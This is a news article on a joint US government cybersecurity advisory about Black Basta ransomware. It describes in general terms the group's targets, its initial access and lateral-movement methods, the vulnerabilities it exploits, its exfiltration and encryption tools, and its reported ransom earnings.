The US Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have released a joint cybersecurity advisory on Black Basta ransomware activity. This initiative is part of the broader StopRansomware campaign aimed at combating cyber threats.
Black Basta, a ransomware-as-a-service (RaaS) variant, has recently ramped up its attacks on critical infrastructure sectors, with a particular focus on Healthcare and Public Health. The advisory highlights the Tactics, Techniques, and Procedures (TTPs) employed by the treat actors, along with Indicators of Compromise (IoCs) obtained from law enforcement investigations and intelligence provided by third-party security firms.
Black Basta affiliates primarily rely on spearphishing to gain initial access. In addition, cybersecurity researchers have noted instances where affiliates utilized the Qakbot malware during this phase.
Since February 2024, Black Basta operators have been exploiting vulnerabilities in ConnectWise software (CVE-2024-1709). They have also been observed abusing valid credentials in some cases. To conduct network scanning, Black Basta affiliates utilize tools like the SoftPerfect network scanner (netscan.exe). They conduct reconnaissance using seemingly innocuous utilities with names like Intel or Dell, often found in the root drive C:.
For lateral movement, Black Basta affiliates employ tools such as BITSAdmin, PsExec, and Remote Desktop Protocol (RDP). Some also utilize Splashtop, Screen Connect, and Cobalt Strike beacons for remote access and further lateral movement.
In terms of privilege escalation, Mimikatz is a favored credential scraping tool. Additionally, Black Basta affiliates have exploited vulnerabilities including ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287), and PrintNightmare (CVE-2021-34527) for local and Windows Active Domain privilege escalation.
For data exfiltration, Black Basta affiliates rely on RClone. Before exfiltrating data, they often use PowerShell to disable antivirus products and may deploy Backstab, a tool designed to disable endpoint detection and response (EDR) tooling. Following termination of antivirus programs, files are fully encrypted using the ChaCha20 algorithm with an RSA-4096 public key. File names are suffixed with a .basta extension, and a ransom note titled readme.txt is left on the compromised system. To impede system recovery, affiliates use vssadmin.exe to delete volume shadow copies.
Since its emergence in April 2022, Black Basta has targeted over 500 organizations worldwide, including both private industry and critical infrastructure entities. The ransomware gang's activities have affected numerous businesses and vital infrastructure facilities in North America, Europe, and Australia.
British blockchain analytics firm Elliptic revealed last year that the group has amassed estimated $107 million in Bitcoin ransom payments since its inception, with the majority of funds laundered through the Russian cryptocurrency exchange Garantex.